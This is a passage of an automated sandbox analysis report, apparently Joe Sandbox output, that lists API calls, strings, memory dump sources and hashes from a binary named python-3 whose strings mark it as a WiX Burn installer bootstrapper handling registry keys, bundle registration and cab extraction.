                                                                                                                                    • Part of subcall function 004C10B8: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,0049069E,?,00000000,00020006), ref: 004C10DD
                                                                                                                                    • Part of subcall function 004C199A: RegSetValueExW.ADVAPI32(00020006,004D0FB8,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0048F3CC,00000000,?,00020006), ref: 004C19CD
                                                                                                                                    • Part of subcall function 004C199A: RegDeleteValueW.ADVAPI32(00020006,004D0FB8,00000000,?,?,0048F3CC,00000000,?,00020006,?,004D0FB8,00020006,00000000,?,?,?), ref: 004C19FD
                                                                                                                                    • Part of subcall function 004C194C: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,0048F324,004D0FB8,Resume,00000005,?,00000000,00000000,00000000), ref: 004C1961
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$Close$CreateDeletelstrlen
                                                                                                                                  • String ID: %ls\%ls$crypt32.dll
                                                                                                                                  • API String ID: 3924016894-1754266218
                                                                                                                                  • Opcode ID: 964840d682e6c3eaa8fd5e63ce32f7802526fc5ad80ec501c7d9734ce433cf7d
                                                                                                                                  • Instruction ID: d10ffa4d79c06259c20e43c4d4f843eeb8d588738e7488ee9127a0ccd57e9e59
                                                                                                                                  • Opcode Fuzzy Hash: 964840d682e6c3eaa8fd5e63ce32f7802526fc5ad80ec501c7d9734ce433cf7d
                                                                                                                                  • Instruction Fuzzy Hash: 49311976C00169BB8F52AF95CC81D9EBBB9FB05754B14417FE910B6221D3398E10DBA4
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004C1436: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,004EBB7C,00000000,?,004C5BF9,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 004C144A
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,004A8CA4,00000000,00000000), ref: 004A8A25
                                                                                                                                  Strings
                                                                                                                                  • Failed to initialize package from related bundle id: %ls, xrefs: 004A8A0B
                                                                                                                                  • Failed to open uninstall key for potential related bundle: %ls, xrefs: 004A8994
                                                                                                                                  • Failed to ensure there is space for related bundles., xrefs: 004A89D8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpen
                                                                                                                                  • String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
                                                                                                                                  • API String ID: 47109696-1717420724
                                                                                                                                  • Opcode ID: 5d06b6167720e83da72b9b294e45fd11aef5a851d0b1bc969f904cccb6cfe0c4
                                                                                                                                  • Instruction ID: 9dd5ea12fc1d77c71748d8d0a36e9b98dc9f5d27dae486cca8bc633e9c89c69c
                                                                                                                                  • Opcode Fuzzy Hash: 5d06b6167720e83da72b9b294e45fd11aef5a851d0b1bc969f904cccb6cfe0c4
                                                                                                                                  • Instruction Fuzzy Hash: 5021B072901219FBDB129E41DC06FEEBA78EF25714F10405FF900B6150DB799E21EB99
                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,80004005,00000000,00000000,00000100,?,0048146A,00000000,80004005,00000000,80004005,00000000,000001C7,?,004813B0), ref: 00483BFA
                                                                                                                                  • HeapReAlloc.KERNEL32(00000000,?,0048146A,00000000,80004005,00000000,80004005,00000000,000001C7,?,004813B0,000001C7,00000100,?,80004005,00000000), ref: 00483C01
                                                                                                                                    • Part of subcall function 00483A1A: GetProcessHeap.KERNEL32(?,000001C7,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A2B
                                                                                                                                    • Part of subcall function 00483A1A: RtlAllocateHeap.NTDLL(00000000,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A32
                                                                                                                                    • Part of subcall function 00483C9A: GetProcessHeap.KERNEL32(00000000,000001C7,?,00482300,000001C7,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483CA2
                                                                                                                                    • Part of subcall function 00483C9A: HeapSize.KERNEL32(00000000,?,00482300,000001C7,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483CA9
                                                                                                                                  • _memcpy_s.LIBCMT ref: 00483C4D
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\memutil.cpp, xrefs: 00483C8E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocAllocateSize_memcpy_s
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\memutil.cpp
                                                                                                                                  • API String ID: 3406509257-517705587
                                                                                                                                  • Opcode ID: 6e76e100e3633fa245566a17545f0f14eca837084380c4e857b8968cf100e6c9
                                                                                                                                  • Instruction ID: 0a32aeec01785bd8305cba7bc3ad42ee4630b501405e0a0aa0841b3c4c14a81e
                                                                                                                                  • Opcode Fuzzy Hash: 6e76e100e3633fa245566a17545f0f14eca837084380c4e857b8968cf100e6c9
                                                                                                                                  • Instruction Fuzzy Hash: 1F112433500118ABCB227E389C49D5F3A59DB40F29B018A1AFC10AB351D779CF1197D8
                                                                                                                                  APIs
                                                                                                                                  • CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,004852B7,00000000,?), ref: 00481244
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,004852B7,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 0048124E
                                                                                                                                  Strings
                                                                                                                                  • ignored , xrefs: 00481213
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\apputil.cpp, xrefs: 0048126F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ArgvCommandErrorLastLine
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\apputil.cpp$ignored
                                                                                                                                  • API String ID: 3459693003-3560123233
                                                                                                                                  • Opcode ID: 4b03da88ec74e849001679acffffa28cdc27bf4dd1ea3a6651cc7f4ddb43c0b2
                                                                                                                                  • Instruction ID: 3c3efb39a3ef6b51c9a9b36236ad34934f477a574a190f268cf07012096964ab
                                                                                                                                  • Opcode Fuzzy Hash: 4b03da88ec74e849001679acffffa28cdc27bf4dd1ea3a6651cc7f4ddb43c0b2
                                                                                                                                  • Instruction Fuzzy Hash: 13116076901225AB8B11AF95C905E9FBBBCEF40B50F01059BFD01F7260D7749E019BE8
                                                                                                                                  APIs
                                                                                                                                  • FormatMessageW.KERNEL32(00484307,00485506,?,00000000,00000000,00000000,?,80070656,?,?,?,0049E6CA,00000000,00485506,00000000,80070656), ref: 004820D4
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0049E6CA,00000000,00485506,00000000,80070656,?,?,0049412F,00485506,?,80070656,00000001,crypt32.dll), ref: 004820E1
                                                                                                                                  • LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,0049E6CA,00000000,00485506,00000000,80070656,?,?,0049412F,00485506), ref: 00482128
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\strutil.cpp, xrefs: 00482105
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\strutil.cpp
                                                                                                                                  • API String ID: 1365068426-1498286024
                                                                                                                                  • Opcode ID: d8d496094f48783fcb082c81c31cfb14444e80ed119f7fb8ec95c8bae00baf9d
                                                                                                                                  • Instruction ID: be7d1c97dfb40119320f51cc63e4e56e6f505f9823a2c312dbacf44d3af36457
                                                                                                                                  • Opcode Fuzzy Hash: d8d496094f48783fcb082c81c31cfb14444e80ed119f7fb8ec95c8bae00baf9d
                                                                                                                                  • Instruction Fuzzy Hash: FF0161B6940229FBDB10AF95CD0AEDFBAACEB04750F114566BE05F7240E6789E00D7E4
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(002E0032,40000000,00000001,00000000,00000002,00000080,00000000,00490545,00000000,?,0048F589,004CB4F0,00000080,002E0032,00000000), ref: 004C51FA
                                                                                                                                  • GetLastError.KERNEL32(?,0048F589,004CB4F0,00000080,002E0032,00000000,?,00490545,crypt32.dll,00000094,?,?,?,?,?,00000000), ref: 004C5207
                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,004CB4F0,0048F589,?,0048F589,004CB4F0,00000080,002E0032,00000000,?,00490545,crypt32.dll,00000094), ref: 004C525B
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\fileutil.cpp, xrefs: 004C522B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\fileutil.cpp
                                                                                                                                  • API String ID: 2528220319-3168567549
                                                                                                                                  • Opcode ID: ebcbc13a55e3fd72ac02758aacf2e0656024b76a424efae8b7b30aae142ee32c
                                                                                                                                  • Instruction ID: 8ab396154955dfdc73782847abdb81956e1b710c6f76d413c316c9af8be96742
                                                                                                                                  • Opcode Fuzzy Hash: ebcbc13a55e3fd72ac02758aacf2e0656024b76a424efae8b7b30aae142ee32c
                                                                                                                                  • Instruction Fuzzy Hash: D801473B601A2467CB311E9A9C06F5F3A94AB40B70F05025BFE20BB2D0CB34AC405AE8
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004C1436: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,004EBB7C,00000000,?,004C5BF9,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 004C144A
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000), ref: 00490813
                                                                                                                                  Strings
                                                                                                                                  • Failed to update name and publisher., xrefs: 004907FD
                                                                                                                                  • Failed to update resume mode., xrefs: 004907E4
                                                                                                                                  • Failed to open registration key., xrefs: 004907CA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpen
                                                                                                                                  • String ID: Failed to open registration key.$Failed to update name and publisher.$Failed to update resume mode.
                                                                                                                                  • API String ID: 47109696-1865096027
                                                                                                                                  • Opcode ID: f7bdb49f52fb874e00c46762d447d3b78f9d236ae7ec1d7911d59577f862f00d
                                                                                                                                  • Instruction ID: 017bd79a25c1bcd0adcd485aaaeff3e4f3f2cb5f4655601725cc6a797334f9f7
                                                                                                                                  • Opcode Fuzzy Hash: f7bdb49f52fb874e00c46762d447d3b78f9d236ae7ec1d7911d59577f862f00d
                                                                                                                                  • Instruction Fuzzy Hash: 2201D836A00625FBCF12A6D19C02FDEBA79AF10724F200077F90076261D7B9AE0097D8
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004AEA12
                                                                                                                                    • Part of subcall function 004B0BE1: RaiseException.KERNEL32(?,?,?,004AEA34,?,00000000,00000000,?,?,?,?,?,004AEA34,?,004E8400), ref: 004B0C41
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004AEA2F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                  • String ID: Unknown exception$YHH
                                                                                                                                  • API String ID: 3476068407-1432213088
                                                                                                                                  • Opcode ID: 6451a08f3b72828312230b4bb96291fb1bad6cfaba0f486fd67cee389654e5ae
                                                                                                                                  • Instruction ID: 835dc331a5b9bc68c68b3b6c7c755826b3c358d3c48b6114097f2549f674a220
                                                                                                                                  • Opcode Fuzzy Hash: 6451a08f3b72828312230b4bb96291fb1bad6cfaba0f486fd67cee389654e5ae
                                                                                                                                  • Instruction Fuzzy Hash: 37F02834904309768F10BAABDC0699E736C5F11714B60892BB824950D2EF7DE91681DD
                                                                                                                                  APIs
                                                                                                                                  • PostThreadMessageW.USER32(?,00009002,00000000,?), ref: 0049EC4F
                                                                                                                                  • GetLastError.KERNEL32 ref: 0049EC59
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\engineforapplication.cpp, xrefs: 0049EC7D
                                                                                                                                  • Failed to post elevate message., xrefs: 0049EC87
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                  • String ID: Failed to post elevate message.$c:\agent\_work\138\s\src\burn\engine\engineforapplication.cpp
                                                                                                                                  • API String ID: 2609174426-2699502814
                                                                                                                                  • Opcode ID: e33f129556d104f2681d4edf9bd96dcd5391a40f8489993934d1924881ef75f1
                                                                                                                                  • Instruction ID: 5735f6f72034f51310671b4aec51cca8185cc9e5e42cc73003839fd0ee45210a
                                                                                                                                  • Opcode Fuzzy Hash: e33f129556d104f2681d4edf9bd96dcd5391a40f8489993934d1924881ef75f1
                                                                                                                                  • Instruction Fuzzy Hash: 8AF0C237640331A7C620AA9A5C0AE577F94BF00B65B11423BBE58AB291D7298C0183DD
                                                                                                                                  APIs
                                                                                                                                  • GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 0048D99C
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,0048495B,00000000,?,?,00485506,?,?), ref: 0048D9AB
                                                                                                                                  • GetLastError.KERNEL32(?,0048495B,00000000,?,?,00485506,?,?), ref: 0048D9B5
                                                                                                                                  Strings
                                                                                                                                  • BootstrapperApplicationDestroy, xrefs: 0048D994
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressErrorFreeLastLibraryProc
                                                                                                                                  • String ID: BootstrapperApplicationDestroy
                                                                                                                                  • API String ID: 1144718084-3186005537
                                                                                                                                  • Opcode ID: 1fcc6621a21de49ae43431ae2cbb426fa38dcdfd1135009839f55267de17d2db
                                                                                                                                  • Instruction ID: 3833cd63b9a5e953432b3006cdea45c7553a26d8bc0c9313586d24821521264c
                                                                                                                                  • Opcode Fuzzy Hash: 1fcc6621a21de49ae43431ae2cbb426fa38dcdfd1135009839f55267de17d2db
                                                                                                                                  • Instruction Fuzzy Hash: EBF04472A01625ABC3156B66D804F2AF768FF00772B158626E819D6650C725DC50CBD8
                                                                                                                                  APIs
                                                                                                                                  • PostThreadMessageW.USER32(?,00009001,00000000,?), ref: 0049F246
                                                                                                                                  • GetLastError.KERNEL32 ref: 0049F250
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\engineforapplication.cpp, xrefs: 0049F274
                                                                                                                                  • Failed to post plan message., xrefs: 0049F27E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                  • String ID: Failed to post plan message.$c:\agent\_work\138\s\src\burn\engine\engineforapplication.cpp
                                                                                                                                  • API String ID: 2609174426-3584526468
                                                                                                                                  • Opcode ID: f367fb2d5fc05aba07d0c0f2e0b26cd27e1452587b26437b2e49565fd3a1b372
                                                                                                                                  • Instruction ID: 2d6a9b7ddc1d8b89dbaec1b235c06334cfea1130b727bef37c1a96341874d301
                                                                                                                                  • Opcode Fuzzy Hash: f367fb2d5fc05aba07d0c0f2e0b26cd27e1452587b26437b2e49565fd3a1b372
                                                                                                                                  • Instruction Fuzzy Hash: C9F0A7376453306786206B966C0AF4BBF84EF04FA1F024077FD18EB291DA19DC1082DD
                                                                                                                                  APIs
                                                                                                                                  • PostThreadMessageW.USER32(?,00009005,?,00000000), ref: 0049F354
                                                                                                                                  • GetLastError.KERNEL32 ref: 0049F35E
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\engineforapplication.cpp, xrefs: 0049F382
                                                                                                                                  • Failed to post shutdown message., xrefs: 0049F38C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                  • String ID: Failed to post shutdown message.$c:\agent\_work\138\s\src\burn\engine\engineforapplication.cpp
                                                                                                                                  • API String ID: 2609174426-83663741
                                                                                                                                  • Opcode ID: a2810244c12eb7a104162928ae597242ed2b83b9f1db192871fc62e7908a7b07
                                                                                                                                  • Instruction ID: d9c34e9fb6a1500be977d9f079ded64ca5042ec0f897c5054772026b571a0415
                                                                                                                                  • Opcode Fuzzy Hash: a2810244c12eb7a104162928ae597242ed2b83b9f1db192871fc62e7908a7b07
                                                                                                                                  • Instruction Fuzzy Hash: 60F0A737641735A786302A9A5C0AF4B7E48AF00BA1B014037FD08EA291E619DC1046DD
                                                                                                                                  APIs
                                                                                                                                  • SetEvent.KERNEL32(004CB468,00000000,?,004A15CD,?,00000000,?,0048C33B,?,?,?,0049759E,?,?,?,?), ref: 004A0682
                                                                                                                                  • GetLastError.KERNEL32(?,004A15CD,?,00000000,?,0048C33B,?,?,?,0049759E,?,?,?,?,?,00000001), ref: 004A068C
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\cabextract.cpp, xrefs: 004A06B0
                                                                                                                                  • Failed to set begin operation event., xrefs: 004A06BA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorEventLast
                                                                                                                                  • String ID: Failed to set begin operation event.$c:\agent\_work\138\s\src\burn\engine\cabextract.cpp
                                                                                                                                  • API String ID: 3848097054-2744104430
                                                                                                                                  • Opcode ID: f0ec6d8a872397b18df8fb5385770618aca347cea680a5c9044ba1d8522027d5
                                                                                                                                  • Instruction ID: 53d8cc34655779d84564f9f05bcb2abe626fecbffd5bd6e353b1339286a2c154
                                                                                                                                  • Opcode Fuzzy Hash: f0ec6d8a872397b18df8fb5385770618aca347cea680a5c9044ba1d8522027d5
                                                                                                                                  • Instruction Fuzzy Hash: FBF0E533A527316B83203A965C1AB8B7A98DF52BA5B01412BFD44FB640EB5D9C3042ED
                                                                                                                                  APIs
                                                                                                                                  • PostThreadMessageW.USER32(?,00009003,00000000,?), ref: 0049EB42
                                                                                                                                  • GetLastError.KERNEL32 ref: 0049EB4C
                                                                                                                                  Strings
                                                                                                                                  • Failed to post apply message., xrefs: 0049EB7A
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\engineforapplication.cpp, xrefs: 0049EB70
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                  • String ID: Failed to post apply message.$c:\agent\_work\138\s\src\burn\engine\engineforapplication.cpp
                                                                                                                                  • API String ID: 2609174426-874079251
